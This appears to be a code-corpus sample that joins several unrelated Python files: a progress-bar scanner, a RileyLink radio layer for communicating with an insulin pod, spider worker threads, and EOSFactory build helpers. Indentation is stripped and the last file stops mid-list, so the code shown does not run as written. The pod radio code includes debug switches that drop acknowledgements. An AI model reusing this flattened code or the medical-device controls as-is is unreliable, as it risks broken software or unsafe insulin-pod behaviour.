counter = 0
Lines = set()
run = True
prefix = ""
formatStr = "{} │{}│ {}{}\r"
class TextIO(io.TextIOWrapper):
def __init__(
self,
func,
buffer: IO[bytes],
encoding: str = ...,
errors: Optional[str] = ...,
newline: Optional[str] = ...,
line_buffering: bool = ...,
write_through: bool = ...,
):
super(ThreadedProgressBar.TextIO, self).__init__(buffer, encoding, errors, newline, line_buffering, write_through)
self.func = func
def write(self, s):
self.func(s.strip("\n "))
def getOriginal(self):
return super()
def __init__(self, maxcount, prefix):
self.maxcount = maxcount
self.stdout = sys.stdout
self.wrapper = ThreadedProgressBar.TextIO(
self._newLine,
sys.stdout.buffer,
sys.stdout.encoding,
sys.stdout.errors,
sys.stdout.newlines,
sys.stdout.line_buffering,
sys.stdout.write_through,
)
sys.stdout = self.wrapper
self.rename(prefix)
def rename(self, prefix):
mx_sz = len(self.formatStr.format(prefix, " " * self.bar_len, 100.0, "%"))
self.bar_len = min(int(os.get_terminal_size().columns - 1 - (mx_sz / 1.25)), mx_sz)
self.bar_len = self.bar_len if self.bar_len > 0 else 0
self.prefix = prefix
def reset(self, maxcount, prefix):
self.maxcount = maxcount
self.rename(prefix)
self.counter = 0
def _newLine(self, String):
self.Lines.add(String)
def _progress(self, count, total, prefix="", printString=""):
if total > 0:
filled_len = int(round(self.bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = "█" * filled_len + "░" * (self.bar_len - filled_len)
proStr = self.formatStr.format(prefix, bar, percents, "%")
if len(printString) > 0:
self.stdout.write(" " * (os.get_terminal_size().columns - 1))
self.stdout.write("\r")
self.stdout.write(printString)
self.stdout.write("\n")
self.stdout.write(proStr)
self.stdout.flush()
def _printThread(self):
while self.run or len(self.Lines) > 0:
if len(self.Lines) > 0:
self._progress(self.counter, self.maxcount, self.prefix, self.Lines.pop())
else:
self._progress(self.counter, self.maxcount, self.prefix)
def start(self):
self.printer = threading.Thread(target=self._printThread)
self.printer.start()
def progress(self):
self.counter += 1
def finish(self):
print("\0") # Eh
self.run = False
self.printer.join()
self._progress(self.counter, self.maxcount, self.prefix)
self.wrapper.flush()
sys.stdout = self.wrapper.getOriginal()
print()
def begin_scan():
for t in Threads:
t.start()
for t in Threads:
t.join()
try:
del IDs[""]
except KeyError:
pass
try:
del TAGs[""]
except KeyError:
pass
def printResults():
maxPrinted = 8
print(Text.header("\nModified Files:"))
c = 0
m = 0
for f in FileRefs:
if f.modified:
if c < maxPrinted:
print(" {}".format(Text.green(f.name)))
c += 1
else:
m += 1
if f.error != "":
Files.add(f)
if m > 1:
print(" {}".format(Text.underline(Text.green("{} more file{}".format(m, "s" if m > 1 else "")))))
sys.stdout.flush()
c = 0
m = 0
print(Text.header("\nFile Errors:"))
for f in Files:
if c < maxPrinted:
print(f.error.strip("\n"))
c += 1
else:
m += 1
if m > 1:
print(" {}".format(Text.underline(Text.red("{} more error{}".format(m, "s" if m > 1 else "")))))
def getOutputFile(path):
output_name = "log_lookup.json"
savePath = "{}\\{}".format(path, output_name)
if savePath.startswith("\\"):
savePath = output_name
return savePath
def save_lookup(path):
toSave = (TAGs, IDs)
touch(path)
with open(getOutputFile(path), "w") as f:
json.dump(toSave, f, indent=4, separators=(",", ": "))
# Start Script
def main():
touch(SOURCE_DEST_NAME)
touch(LIBRARIES_DEST_NAME)
allocate_files(SOURCE_NAME, WORKING_DIRECTORY_OFFSET)
allocate_files(LIBRARIES_NAME, WORKING_DIRECTORY_OFFSET)
if not BYPASS_SCRIPT:
print()
time.sleep(0.5) # Let terminal settle
print(Text.warning("Available Ram: {} GBs\n".format(AvailableRam())))
prehash = hashFile(getOutputFile(FILE_OUTPUT_PATH))
print("Files to search: {}".format(len(FileRefs)))
tb = ThreadedProgressBar(len(Files), Text.important("Completed Files:"))
dole_files(8, tb.progress)
print("Threads to run: {}\n".format(len(Threads)))
tb.start()
begin_scan()
tb.finish()
printResults()
save_lookup(FILE_OUTPUT_PATH)
newhash = hashFile(getOutputFile(FILE_OUTPUT_PATH))
if FILE_CHANGE:
print(Text.important("\nNote: Files have changed, rebuild inbound"))
if newhash != prehash:
print(Text.reallyImportant("\nNote: Output file values have changed"))
# try:
# shutil.rmtree(SOURCE_DEST_NAME)
# shutil.rmtree(LIBRARIES_DEST_NAME)
# except FileNotFoundError:
# pass
if __name__ == "__main__":
main()
# @endcond
|
protocol_radio.py
|
from .exceptions import PacketRadioError, OmnipyTimeoutError, RecoverableProtocolError, StatusUpdateRequired
from podcomm.packet_radio import TxPower
from podcomm.protocol_common import *
from .pr_rileylink import RileyLink
from .definitions import *
from threading import Thread, Event, RLock
import binascii
import time
import subprocess
def _ack_data(address1, address2, sequence):
return RadioPacket(address1, RadioPacketType.ACK, sequence,
struct.pack(">I", address2))
class MessageExchange:
def __init__(self):
self.unique_packets = 0
self.repeated_sends = 0
self.receive_timeouts = 0
self.repeated_receives = 0
self.protocol_errors = 0
self.bad_packets = 0
self.radio_errors = 0
self.successful = False
self.queued = 0
self.started = 0
self.ended = 0
class PdmRadio:
def __init__(self, radio_address, msg_sequence=0, pkt_sequence=0, packet_radio=None):
self.radio_address = radio_address
self.message_sequence = msg_sequence
self.packet_sequence = pkt_sequence
self.logger = getLogger()
self.packet_logger = get_packet_logger()
if packet_radio is None:
self.packet_radio = RileyLink()
else:
self.packet_radio = packet_radio
self.last_packet_received = None
self.last_packet_timestamp = None
self.request_arrived = Event()
self.response_received = Event()
self.request_shutdown = Event()
self.request_message = None
self.double_take = False
self.tx_power = None
self.expect_critical_follow_up = False
self.pod_message = None
self.response_exception = None
self.radio_thread = None
self.pdm_message = None
self.pdm_message_address = None
self.ack_address_override = None
self.debug_cut_last_ack = False
self.debug_cut_msg_after = None
self.debug_cut_message_seq = 0
self.debug_cut_packet_seq = 0
self.stats = []
self.current_exchange = MessageExchange()
self.radio_lock = RLock()
self.start()
def start(self):
with self.radio_lock:
self.radio_thread = Thread(target=self._radio_loop)
self.radio_thread.setDaemon(True)
self._radio_init()
self.radio_thread.start()
def stop(self):
with self.radio_lock:
self.request_shutdown.set()
self.request_arrived.set()
self.radio_thread.join()
self.radio_thread = None
self.request_shutdown.clear()
def send_message_get_message(self, message,
message_address = None,
ack_address_override=None,
tx_power=None, double_take=False,
expect_critical_follow_up=False):
queued = time.time()
with self.radio_lock:
if self.radio_thread is None:
raise PacketRadioError("Radio is stopped")
self.pdm_message = message
if message_address is None:
self.pdm_message_address = self.radio_address
else:
self.pdm_message_address = message_address
self.ack_address_override = ack_address_override
self.pod_message = None
self.double_take = double_take
self.tx_power = tx_power
self.expect_critical_follow_up = expect_critical_follow_up
self.request_arrived.set()
self.response_received.wait()
self.response_received.clear()
self.current_exchange.queued = queued
if self.pod_message is None:
self.current_exchange.successful = False
self.stats.append(self.current_exchange)
raise self.response_exception
self.current_exchange.successful = True
self.stats.append(self.current_exchange)
return self.pod_message
def get_packet(self, timeout=30000):
with self.radio_lock:
received = self.packet_radio.get_packet(timeout=timeout)
p, rssi = self._get_packet(received)
return p
def disconnect(self):
with self.radio_lock:
self._disconnect()
def _disconnect(self):
try:
self.packet_radio.disconnect(ignore_errors=True)
except Exception:
self.logger.exception("Error while disconnecting")
def _radio_loop(self):
while True:
if not self.request_arrived.wait(timeout=5.0):
self._disconnect()
self.request_arrived.wait()
self.request_arrived.clear()
if self.request_shutdown.wait(0):
self._disconnect()
break
self.current_exchange = MessageExchange()
self.current_exchange.started = time.time()
try:
self.pod_message = self._send_and_get(self.pdm_message, self.pdm_message_address,
self.ack_address_override,
tx_power=self.tx_power, double_take=self.double_take,
expect_critical_follow_up=self.expect_critical_follow_up)
self.response_exception = None
except Exception as e:
self.pod_message = None
self.response_exception = e
if self.response_exception is None:
ack_packet = self._final_ack(self.ack_address_override, self.packet_sequence)
self.current_exchange.ended = time.time()
self.response_received.set()
if not self.debug_cut_last_ack:
try:
self._send_packet(ack_packet, allow_premature_exit_after=3.5)
except Exception:
self.logger.exception("Error during ending conversation, ignored.")
else:
self.message_sequence = (self.message_sequence - self.debug_cut_message_seq) % 16
self.packet_sequence = (self.packet_sequence - self.debug_cut_packet_seq) % 16
self.last_packet_received = None
self.last_packet_timestamp = None
else:
self.current_exchange.ended = time.time()
self.response_received.set()
def _interim_ack(self, ack_address_override, sequence):
if ack_address_override is None:
return _ack_data(self.radio_address, self.radio_address, sequence)
else:
return _ack_data(self.radio_address, ack_address_override, sequence)
def _final_ack(self, ack_address_override, sequence):
if ack_address_override is None:
return _ack_data(self.radio_address, 0, sequence)
else:
return _ack_data(self.radio_address, ack_address_override, sequence)
def _radio_init(self, retries=1):
retry = 0
while retry < retries:
try:
self.packet_radio.disconnect()
self.packet_radio.connect(force_initialize=True)
return True
except:
self.logger.exception("Error during radio initialization")
self._kill_btle_subprocess()
time.sleep(2)
retry += 1
return False
def _kill_btle_subprocess(self):
try:
p = subprocess.Popen(["ps", "-A"], stdout=subprocess.PIPE)
out, err = p.communicate()
for line in out.splitlines():
if "bluepy-helper" in line:
pid = int(line.split(None, 1)[0])
os.kill(pid, 9)
break
except:
self.logger.warning("Failed to kill bluepy-helper")
def _reset_sequences(self):
self.packet_sequence = 0
self.message_sequence = (self.message_sequence + 1) % 16
def _send_and_get(self, pdm_message, pdm_message_address, ack_address_override=None,
tx_power=None, double_take=False, expect_critical_follow_up=False):
packets = pdm_message.get_radio_packets(message_address=pdm_message_address,
message_sequence=self.message_sequence,
packet_address=self.radio_address,
first_packet_sequence=self.packet_sequence,
double_take=double_take,
expect_critical_follow_up=expect_critical_follow_up)
try:
if tx_power is not None:
self.packet_radio.set_tx_power(tx_power)
except PacketRadioError:
if not self._radio_init(3):
raise
received = None
packet_count = len(packets)
self.current_exchange.unique_packets = packet_count * 2
for part in range(0, packet_count):
packet = packets[part]
repeat_count = -1
timeout = 10
while True:
repeat_count += 1
if repeat_count == 0:
self.logger.debug("Sending PDM message part %d/%d" % (part + 1, packet_count))
else:
self.logger.debug("Sending PDM message part %d/%d (Repeat: %d)" %
(part + 1, packet_count, repeat_count))
if part == packet_count - 1:
expected_type = RadioPacketType.POD
else:
expected_type = RadioPacketType.ACK
try:
if self.debug_cut_msg_after is None or self.debug_cut_msg_after != part:
received = self._exchange_packets(packet.with_sequence(self.packet_sequence),
expected_type=expected_type,
timeout=timeout)
break
else:
raise Exception("debug cut here")
except OmnipyTimeoutError:
self.logger.debug("Trying to recover from timeout error")
if part == 0:
if repeat_count == 0:
timeout = 15
continue
elif repeat_count == 1:
timeout = 10
time.sleep(2)
continue
elif repeat_count == 2:
self._radio_init()
timeout = 15
continue
else:
self.logger.debug("Failed recovery")
self._reset_sequences()
raise
elif part < packet_count - 1:
if repeat_count < 2:
timeout = 20
continue
else:
raise
else:
if repeat_count < 10:
timeout = 20
continue
else:
raise
except PacketRadioError:
self.logger.debug("Trying to recover from radio error")
self.current_exchange.radio_errors += 1
if part == 0:
if repeat_count < 2:
self._radio_init()
continue
elif repeat_count < 4:
self._disconnect()
self._kill_btle_subprocess()
timeout = 10
time.sleep(2)
continue
else:
self.logger.debug("Failed recovery")
raise
elif part < packet_count - 1:
if repeat_count < 6:
self._disconnect()
self._kill_btle_subprocess()
timeout = 10
time.sleep(2)
continue
else:
self.logger.debug("Failed recovery")
raise
else:
if repeat_count < 10:
self._disconnect()
self._kill_btle_subprocess()
timeout = 10
time.sleep(2)
continue
else:
self.logger.debug("Failed recovery")
raise
except RecoverableProtocolError as rpe:
self.logger.debug("Trying to recover from protocol error")
self.packet_sequence = (rpe.packet.sequence + 1) % 32
self.message_sequence = (self.message_sequence + 1) % 16
if expected_type == RadioPacketType.POD and rpe.packet.type == RadioPacketType.ACK:
raise StatusUpdateRequired()
continue
except ProtocolError:
self.logger.debug("Trying to recover from protocol error")
self.packet_sequence = (self.packet_sequence + 2) % 32
continue
part += 1
self.packet_sequence = (received.sequence + 1) % 32
self.packet_logger.info("SENT MSG %s" % pdm_message)
part_count = 0
if received.type == RadioPacketType.POD:
part_count = 1
self.logger.debug("Received POD message part %d." % part_count)
pod_response = PodMessage()
while not pod_response.add_radio_packet(received):
ack_packet = self._interim_ack(ack_address_override, (received.sequence + 1) % 32)
received = self._exchange_packets(ack_packet, RadioPacketType.CON)
part_count += 1
self.logger.debug("Received POD message part %d." % part_count)
self.packet_logger.info("RCVD MSG %s" % pod_response)
self.logger.debug("Send and receive completed.")
self.message_sequence = (pod_response.sequence + 1) % 16
self.packet_sequence = (received.sequence + 1) % 32
return pod_response
def _exchange_packets(self, packet_to_send, expected_type, timeout=10):
start_time = None
first = True
while start_time is None or time.time() - start_time < timeout:
if first:
first = False
else:
self.current_exchange.repeated_sends += 1
if self.last_packet_timestamp is None or time.time() - self.last_packet_timestamp > 4:
received = self.packet_radio.send_and_receive_packet(packet_to_send.get_data(), 0, 0, 300, 1, 300)
else:
received = self.packet_radio.send_and_receive_packet(packet_to_send.get_data(), 0, 0, 120, 0, 40)
if start_time is None:
start_time = time.time()
self.packet_logger.info("SEND PKT %s" % packet_to_send)
if received is None:
self.current_exchange.receive_timeouts += 1
self.packet_logger.debug("RECV PKT None")
self.packet_radio.tx_up()
continue
p, rssi = self._get_packet(received)
if p is None:
self.current_exchange.bad_packets += 1
self.packet_logger.debug("RECV PKT BAD DATA: %s" % received.hex())
self.packet_radio.tx_down()
continue
self.packet_logger.info("RECV PKT %s" % p)
if p.address != self.radio_address:
self.current_exchange.bad_packets += 1
self.packet_logger.debug("RECV PKT ADDR MISMATCH")
self.packet_radio.tx_down()
continue
self.last_packet_timestamp = time.time()
if self.last_packet_received is not None and \
p.sequence == self.last_packet_received.sequence and \
p.type == self.last_packet_received.type:
self.current_exchange.repeated_receives += 1
self.packet_logger.debug("RECV PKT previous")
self.packet_radio.tx_up()
continue
self.last_packet_received = p
self.packet_sequence = (p.sequence + 1) % 32
if expected_type is not None and p.type != expected_type:
self.packet_logger.debug("RECV PKT unexpected type %s" % p)
self.current_exchange.protocol_errors += 1
raise RecoverableProtocolError("Unexpected packet type", p)
if p.sequence != (packet_to_send.sequence + 1) % 32:
self.packet_sequence = (p.sequence + 1) % 32
self.packet_logger.debug("RECV PKT unexpected sequence %s" % p)
self.last_packet_received = p
self.current_exchange.protocol_errors += 1
raise RecoverableProtocolError("Incorrect packet sequence", p)
return p
raise OmnipyTimeoutError("Exceeded timeout while send and receive")
def _send_packet(self, packet_to_send, timeout=25, allow_premature_exit_after=None):
start_time = None
self.current_exchange.unique_packets += 1
while start_time is None or time.time() - start_time < timeout:
try:
self.packet_logger.info("SEND PKT %s" % packet_to_send)
received = self.packet_radio.send_and_receive_packet(packet_to_send.get_data(), 0, 0, 300, 0, 40)
if start_time is None:
start_time = time.time()
if allow_premature_exit_after is not None and \
time.time() - start_time >= allow_premature_exit_after:
if self.request_arrived.wait(timeout=0):
self.logger.debug("Prematurely exiting final phase to process next request")
self.packet_sequence = (self.packet_sequence + 1) % 32
break
if received is None:
received = self.packet_radio.get_packet(0.6)
if received is None:
self.packet_logger.debug("Silence")
self.packet_sequence = (self.packet_sequence + 1) % 32
break
p, rssi = self._get_packet(received)
if p is None:
self.current_exchange.bad_packets += 1
self.packet_logger.debug("RECV PKT bad %s" % received.hex())
self.packet_radio.tx_down()
continue
if p.address != self.radio_address:
self.current_exchange.bad_packets += 1
self.packet_logger.debug("RECV PKT ADDR MISMATCH")
self.packet_radio.tx_down()
continue
self.last_packet_timestamp = time.time()
if self.last_packet_received is not None:
self.current_exchange.repeated_receives += 1
if p.type == self.last_packet_received.type and p.sequence == self.last_packet_received.sequence:
self.packet_logger.debug("RECV PKT previous")
self.packet_radio.tx_up()
continue
self.packet_logger.info("RECV PKT %s" % p)
self.packet_logger.debug("RECEIVED unexpected packet: %s" % p)
self.current_exchange.protocol_errors = 1
self.last_packet_received = p
self.packet_sequence = (p.sequence + 1) % 32
packet_to_send.with_sequence(self.packet_sequence)
start_time = time.time()
continue
except PacketRadioError:
self.current_exchange.radio_errors += 1
self.logger.exception("Radio error during send and receive, retrying")
if not self._radio_init(3):
raise
start_time = time.time()
else:
self.logger.warning("Exceeded timeout while waiting for silence to fall")
def _get_packet(self, data):
rssi = None
if data is not None and len(data) > 2:
rssi = data[0]
try:
return RadioPacket.parse(data[2:]), rssi
except:
getLogger().exception("RECEIVED DATA: %s RSSI: %d" % (binascii.hexlify(data[2:]), rssi))
return None, rssi
|
base_service.py
|
from threading import Thread, Event
import logging
import sys
# pylint: disable=invalid-name
logger = logging.getLogger('grab.spider.base_service')
# pylint: enable=invalid-name
class ServiceWorker(object):
def __init__(self, spider, worker_callback):
self.spider = spider
self.thread = Thread(
target=self.worker_callback_wrapper(worker_callback),
args=[self]
)
self.thread.daemon = True
th_name = 'worker:%s:%s' % (
worker_callback.__self__.__class__.__name__,
worker_callback.__name__,
)
self.thread.name = th_name
self.pause_event = Event()
self.stop_event = Event()
self.resume_event = Event()
self.activity_paused = Event()
self.is_busy_event = Event()
def worker_callback_wrapper(self, callback):
def wrapper(*args, **kwargs):
try:
callback(*args, **kwargs)
except Exception as ex: # pylint: disable=broad-except
logger.error('Spider Service Fatal Error', exc_info=ex)
self.spider.fatal_error_queue.put(sys.exc_info())
return wrapper
def start(self):
self.thread.start()
def stop(self):
self.stop_event.set()
def process_pause_signal(self):
if self.pause_event.is_set():
self.activity_paused.set()
self.resume_event.wait()
def pause(self):
self.resume_event.clear()
self.pause_event.set()
while True:
if self.activity_paused.wait(0.1):
break
if not self.is_alive():
break
def resume(self):
self.pause_event.clear()
self.activity_paused.clear()
self.resume_event.set()
def is_alive(self):
return self.thread.is_alive()
class BaseService(object):
def create_worker(self, worker_action):
# pylint: disable=no-member
return ServiceWorker(self.spider, worker_action)
def iterate_workers(self, objects):
for obj in objects:
assert isinstance(obj, (ServiceWorker, list))
if isinstance(obj, ServiceWorker):
yield obj
elif isinstance(obj, list):
for item in obj:
yield item
def start(self):
for worker in self.iterate_workers(self.worker_registry):
worker.start()
def stop(self):
for worker in self.iterate_workers(self.worker_registry):
worker.stop()
def pause(self):
for worker in self.iterate_workers(self.worker_registry):
worker.pause()
#logging.debug('Service %s paused' % self.__class__.__name__)
def resume(self):
for worker in self.iterate_workers(self.worker_registry):
worker.resume()
#logging.debug('Service %s resumed' % self.__class__.__name__)
def register_workers(self, *args):
# pylint: disable=attribute-defined-outside-init
self.worker_registry = args
def is_busy(self):
return any(x.is_busy_event.is_set() for x in
self.iterate_workers(self.worker_registry))
def is_alive(self):
return any(x.is_alive() for x in
self.iterate_workers(self.worker_registry))
|
teos.py
|
#!/usr/bin/python3
import os
import subprocess
import threading
import time
import re
import pathlib
import shutil
import pprint
import json
import shutil
import sys
import eosfactory.core.errors as errors
import eosfactory.core.logger as logger
import eosfactory.core.utils as utils
import eosfactory.core.setup as setup
import eosfactory.core.config as config
import eosfactory.core.vscode as vscode
TEMPLATE_CONTRACTS_DIR = "templates/contracts"
TEMPLATE_NAME = "CONTRACT_NAME"
TEMPLATE_HOME = "${HOME}"
TEMPLATE_ROOT = "${ROOT}"
C_CPP_PROP = "${c_cpp_prop}"
TASK_JSON = "${tasks}"
CONFIGURATIONS = "configurations"
INCLUDE_PATH = "includePath"
BROWSE = "browse"
WORKSPACE_FOLDER = "${workspaceFolder}"
EOSIO_CPP_INCLUDE = "/usr/opt/eosio.cdt"
def replace_templates(string):
home = os.environ["HOME"]
root = ""
if is_windows_ubuntu():
home = config.wsl_root() + home
root = config.wsl_root()
string = string.replace(TEMPLATE_HOME, home)
string = string.replace(TEMPLATE_ROOT, root)
return string
def get_c_cpp_properties(contract_dir=None, c_cpp_properties_path=None):
if not contract_dir:
contract_dir = os.getcwd()
if not c_cpp_properties_path:
c_cpp_properties_path = os.path.join(
contract_dir, ".vscode/c_cpp_properties.json")
else:
c_cpp_properties_path = utils.wslMapWindowsLinux(c_cpp_properties_path)
if not os.path.exists(c_cpp_properties_path):
raise errors.Error('''
The given path does not exist:
${}
'''.format(c_cpp_properties_path))
if os.path.exists(c_cpp_properties_path):
try:
with open(c_cpp_properties_path, "r") as input:
return json.loads(input.read())
except Exception as e:
raise errors.Error(str(e))
else:
return json.loads(replace_templates(vscode.c_cpp_properties()))
def ABI(
contract_dir_hint=None, c_cpp_properties_path=None,
verbosity=None):
'''Given a hint to a contract directory, produce ABI file.
'''
contract_dir = config.contract_dir(contract_dir_hint)
# source_files[0] is directory, source_files[1] is contents:
contract_source_files = config.contract_source_files(contract_dir)
source_files = []
source_ext = [".c", ".cpp",".cxx", ".c++"]
for file in contract_source_files[1]:
if os.path.splitext(file)[1].lower() in source_ext:
source_files.append(file)
if not source_files:
raise errors.Error('''
"The source is empty. The assumed contract dir is
{}
'''.format(contract_dir))
return
code_name = os.path.splitext(os.path.basename(source_files[0]))[0]
target_dir = get_target_dir(contract_source_files[0])
target_path = os.path.normpath(
os.path.join(target_dir, code_name + ".abi"))
for file in contract_source_files[1]:
if os.path.splitext(file)[1].lower() == ".abi":
logger.INFO('''
NOTE:
An ABI exists in the source directory. Cannot overwrite it:
{}
Just copying it to the target directory.
'''.format(file), verbosity)
shutil.move(file, target_path)
return
command_line = [
config.eosio_cpp(),
"-contract=" + code_name,
"-R=" + get_resources_dir(contract_source_files[0]),
"-abigen",
"-abigen_output=" + target_path]
c_cpp_properties = get_c_cpp_properties(
contract_dir, c_cpp_properties_path)
for entry in c_cpp_properties[CONFIGURATIONS][0][INCLUDE_PATH]:
if WORKSPACE_FOLDER in entry:
entry = entry.replace(WORKSPACE_FOLDER, contract_dir)
command_line.append(
"-I" + utils.wslMapWindowsLinux(entry))
else:
if not EOSIO_CPP_INCLUDE in entry:
command_line.append(
"-I" + utils.wslMapWindowsLinux(
strip_wsl_root(entry)))
for file in source_files:
command_line.append(file)
try:
eosio_cpp(command_line, target_dir)
except Exception as e:
raise errors.Error(str(e))
logger.TRACE('''
ABI file writen to file:
{}
'''.format(target_path), verbosity)
def WASM(
contract_dir_hint, c_cpp_properties_path=None,
compile_only=False, verbosity=None):
'''Produce WASM code.
'''
contract_dir = config.contract_dir(contract_dir_hint)
# source_files[0] is directory, source_files[1] is contents:
contract_source_files = config.contract_source_files(contract_dir)
source_files = []
source_ext = [".c", ".cpp",".cxx", ".c++"]
for file in contract_source_files[1]:
if os.path.splitext(file)[1].lower() in source_ext:
source_files.append(file)
if not source_files:
raise errors.Error('''
"The source is empty. The assumed contract dir is
{}
'''.format(contract_dir))
return
code_name = os.path.splitext(os.path.basename(source_files[0]))[0]
target_dir = get_target_dir(contract_source_files[0])
target_path = os.path.normpath(
os.path.join(target_dir, code_name + ".wasm"))
c_cpp_properties = get_c_cpp_properties(
contract_dir, c_cpp_properties_path)
command_line = [config.eosio_cpp()]
for entry in c_cpp_properties[CONFIGURATIONS][0][INCLUDE_PATH]:
if WORKSPACE_FOLDER in entry:
entry = entry.replace(WORKSPACE_FOLDER, contract_dir)
command_line.append("-I=" + utils.wslMapWindowsLinux(entry))
else:
if not EOSIO_CPP_INCLUDE in entry:
command_line.append(
"-I=" + utils.wslMapWindowsLinux(strip_wsl_root(entry)))
for entry in c_cpp_properties[CONFIGURATIONS][0]["libs"]:
command_line.append(
"-l=" + utils.wslMapWindowsLinux(strip_wsl_root(entry)))
for entry in c_cpp_properties[CONFIGURATIONS][0]["compilerOptions"]:
command_line.append(entry)
for file in source_files:
command_line.append(file)
if setup.is_print_command_line:
print("######## \n{}:".format(" ".join(command_line)))
if compile_only:
command_line.append("-c=")
command_line.append("-o=" + target_path)
try:
eosio_cpp(command_line, target_dir)
except Exception as e:
raise errors.Error(str(e))
if not compile_only:
logger.TRACE('''
WASM file writen to file:
{}
'''.format(os.path.normpath(target_path)), verbosity)
def project_from_template(
project_name, template=None, workspace_dir=None,
c_cpp_prop_path=None,
include=None,
libs=None,
remove_existing=False,
open_vscode=False, throw_exists=False,
verbosity=None):
'''Given the project name and template name, create a smart contract project.
- **parameters**::
project_name: The name of the project, or an existing path to
a directory.
template: The name of the template used.
workspace_dir: If set, the folder for the work-space. Defaults to the
value returned by the config.contract_workspace() function.
include: If set, comma-separated list of include folders.
libs: If set, comma-separated list of libraries.
remove_existing: If set, overwrite any existing project.
visual_studio_code: If set, open the ``VSCode``, if available.
verbosity: The logging configuration.
'''
project_name = utils.wslMapWindowsLinux(project_name.strip())
template = template.strip()
template_dir = utils.wslMapWindowsLinux(template)
if not os.path.isdir(template_dir):
template_dir = os.path.join(
config.eosf_dir(), TEMPLATE_CONTRACTS_DIR, template)
if not os.path.isdir(template_dir):
raise errors.Error('''
TemplateCreate '{}' does not exist.
'''.format(template_dir))
if c_cpp_prop_path:
c_cpp_prop_path = utils.wslMapWindowsLinux(c_cpp_prop_path)
if os.path.exists(c_cpp_prop_path):
try:
with open(c_cpp_prop_path, "r") as input:
c_cpp_properties = input.read()
except Exception:
c_cpp_properties = vscode.c_cpp_properties()
else:
c_cpp_properties = vscode.c_cpp_properties()
c_cpp_properties = replace_templates(c_cpp_properties)
if include:
c_cpp_properties_json = json.loads(c_cpp_properties)
c_cpp_properties_json[CONFIGURATIONS][0][INCLUDE_PATH].extend(
include.split(", "))
c_cpp_properties_json[CONFIGURATIONS][0][BROWSE]["path"].extend(
include.split(", "))
c_cpp_properties = json.dumps(c_cpp_properties_json, indent=4)
if libs:
c_cpp_properties_json = json.loads(c_cpp_properties)
c_cpp_properties_json[CONFIGURATIONS][0]["libs"].extend(
libs.split(", "))
c_cpp_properties = json.dumps(c_cpp_properties_json, indent=4)
split = os.path.split(project_name)
if os.path.isdir(split[0]):
project_dir = project_name
project_name = split[1]
else:
if not workspace_dir \
or not os.path.isabs(workspace_dir) \
or not os.path.exists(workspace_dir):
workspace_dir = config.contract_workspace()
workspace_dir = workspace_dir.strip()
project_dir = os.path.join(workspace_dir, project_name)
if os.path.isdir(project_dir):
if os.listdir(project_dir):
if remove_existing:
try:
shutil.rmtree(project_dir)
except Exception as e:
raise errors.Error('''
Cannot remove the directory {}.
error message:
==============
{}
'''.format(project_dir, str(e)))
else:
msg = '''
NOTE:
Contract workspace
'{}'
already exists. Cannot overwrite it.
'''.format(project_dir)
if throw_exists:
raise errors.Error(msg)
else:
raise errors.Error(msg)
return
try: # make contract directory and its build directory:
os.makedirs(os.path.join(project_dir, "build"))
except Exception as e:
raise errors.Error(str(e))
def copy_dir_contents(
project_dir, template_dir, directory, project_name):
contents = os.listdir(os.path.join(template_dir, directory))
for item in contents:
path = os.path.join(directory, item)
template_path = os.path.join(template_dir, path)
contract_path = os.path.join(
project_dir, path.replace(
TEMPLATE_NAME, project_name))
if os.path.isdir(template_path):
os.mkdir(contract_path)
copy_dir_contents(
project_dir, template_dir, path, project_name)
elif os.path.isfile(template_path):
copy(template_path, contract_path, project_name)
def copy(template_path, contract_path, project_name):
with open(template_path, "r") as input:
template = input.read()
if TEMPLATE_HOME in template or TEMPLATE_ROOT in template:
home = os.environ["HOME"]
root = ""
if is_windows_ubuntu():
replace_templates(template)
template = template.replace("${" + TEMPLATE_NAME + "}", project_name)
template = template.replace(C_CPP_PROP, c_cpp_properties)
template = template.replace(TASK_JSON, vscode.TASKS)
with open(contract_path, "w") as output:
output.write(template)
copy_dir_contents(project_dir, template_dir, "", project_name)
logger.TRACE('''
* Contract project '{}' created from template
'{}'
'''.format(project_name, template_dir), verbosity)
if open_vscode:
if is_windows_ubuntu():
command_line = "cmd.exe /C code {}".format(
utils.wslMapLinuxWindows(project_dir))
elif uname() == "Darwin":
command_line = "open -n -b com.microsoft.VSCode --args {}".format(
project_dir)
else:
command_line = "code {}".format(project_dir)
os.system(command_line)
logger.INFO('''
######### Created contract project ``{}``,
originated from template
``{}``.
'''.format(project_name, template_dir), verbosity)
return project_dir
def strip_wsl_root(path):
wsl_root = config.wsl_root()
if wsl_root:
return path.replace(config.wsl_root(), "")
else:
return path
def get_pid(name=None):
"""Return process ids found by (partial) name or regex.
>>> get_process_id('kthreadd')
[2]
>>> get_process_id('watchdog')
[10, 11, 16, 21, 26, 31, 36, 41, 46, 51, 56, 61] # ymmv
>>> get_process_id('non-existent process')
[]
"""
if not name:
name = os.path.splitext(os.path.basename(config.node_exe()))[0]
command_line = ['pgrep', '-f', name]
stdout = utils.process(
command_line, "Cannot determine PID of any nodeos process.")
return [int(pid) for pid in stdout.split()]
def uname(options=None):
command_line = ['uname']
if options:
command_line.append(options)
return utils.process(command_line)
def is_windows_ubuntu():
resp = uname("-v")
return resp.find("Microsoft") != -1
def eosio_cpp(command_line, target_dir):
cwd = os.path.join(target_dir, "cwd")
os.mkdir(cwd)
p = subprocess.run(
command_line,
cwd=cwd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout = p.stdout.decode("ISO-8859-1")
stderr = p.stderr.decode("ISO-8859-1")
returncode = p.returncode
shutil.rmtree(cwd)
if returncode:
raise errors.Error('''
command line:
=============
{}
error message:
==============
{}
'''.format(" ".join(command_line), stderr))
return returncode
def get_target_dir(source_dir):
dir = os.path.join(source_dir, "build")
if os.path.exists(dir):
return dir
dir = os.path.join(source_dir, "..", "build")
if os.path.exists(dir):
return dir
try:
os.mkdir(dir)
except Exception as e:
raise errors.Error(str(e))
return dir
def get_resources_dir(source_dir):
dir = os.path.join(source_dir, "..", "resources")
if os.path.exists(dir):
return dir
dir = os.path.join(source_dir, "resources")
if not os.path.exists(dir):
try:
os.mkdir(dir)
except Exception as e:
raise errors.Error(str(e))
return dir
def args(clear=False):
args_ = [
"--http-server-address", config.http_server_address(),
"--data-dir", config.data_dir(),
"--config-dir", config.config_dir(),
"--chain-state-db-size-mb", config.chain_state_db_size_mb(),
"--contracts-console",
"--verbose-http-errors",
"--enable-stale-production",
"--producer-name eosio",
"--signature-provider " + config.eosio_key_public() + "=KEY:"
+ config.eosio_key_private(),
